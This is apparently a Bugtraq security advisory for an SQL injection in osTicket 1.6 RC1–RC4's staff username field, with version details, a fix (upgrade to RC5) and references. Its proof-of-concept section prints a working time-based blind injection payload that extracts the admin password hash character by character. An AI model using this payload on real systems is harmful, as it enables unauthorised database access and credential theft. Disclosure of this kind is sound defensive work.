osTicket Staff Username SQL Injection Vulnerability
BID:35516
Info
osTicket Staff Username SQL Injection Vulnerability
| Bugtraq ID: | 35516 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-2361 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 29 2009 12:00AM |
| Updated: | Jul 20 2009 10:16PM |
| Credit: | Adam Baldwin |
| Vulnerable: |
osTicket osTicket 1.6 RC4 osTicket osTicket 1.6 RC3 osTicket osTicket 1.6 RC2 osTicket osTicket 1.6 RC1 |
| Not Vulnerable: |
osTicket osTicket 1.6 RC5 |
Discussion
osTicket Staff Username SQL Injection Vulnerability
osTicket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to osTicket 1.6 RC5 are vulnerable.
osTicket is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Versions prior to osTicket 1.6 RC5 are vulnerable.
Exploit / POC
osTicket Staff Username SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example SQL data is available:
Insert the following into the staff username
'+(SELECT
IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
FROM ost_staff where staff_id=1) and '1'='1
Attackers can use a browser to exploit this issue.
The following example SQL data is available:
Insert the following into the staff username
'+(SELECT
IF(SUBSTRING(passwd,1,1)=CHAR(48),BENCHMARK(1000000,SHA1(1)),0) passwd
FROM ost_staff where staff_id=1) and '1'='1
Solution / Fix
osTicket Staff Username SQL Injection Vulnerability
Solution:
The vendor has released an update. Please see the references for details.
osTicket osTicket 1.6 RC1
osTicket osTicket 1.6 RC2
osTicket osTicket 1.6 RC4
Solution:
The vendor has released an update. Please see the references for details.
osTicket osTicket 1.6 RC1
-
osTicket osticket_1.6.rc5.tar.gz
http://osticket.com/dl/osticket_1.6.rc5.tar.gz
osTicket osTicket 1.6 RC2
-
osTicket osticket_1.6.rc5.tar.gz
http://osticket.com/dl/osticket_1.6.rc5.tar.gz
osTicket osTicket 1.6 RC4
-
osTicket osticket_1.6.rc5.tar.gz
http://osticket.com/dl/osticket_1.6.rc5.tar.gz
References
osTicket Staff Username SQL Injection Vulnerability
References:
References:
- osTicket Homepage (osTicket)
- osTicket SVA-2009-624 (osTicket)
- osTicket v1.6 RC4 Admin Login Blind SQLi (Adam Baldwin
)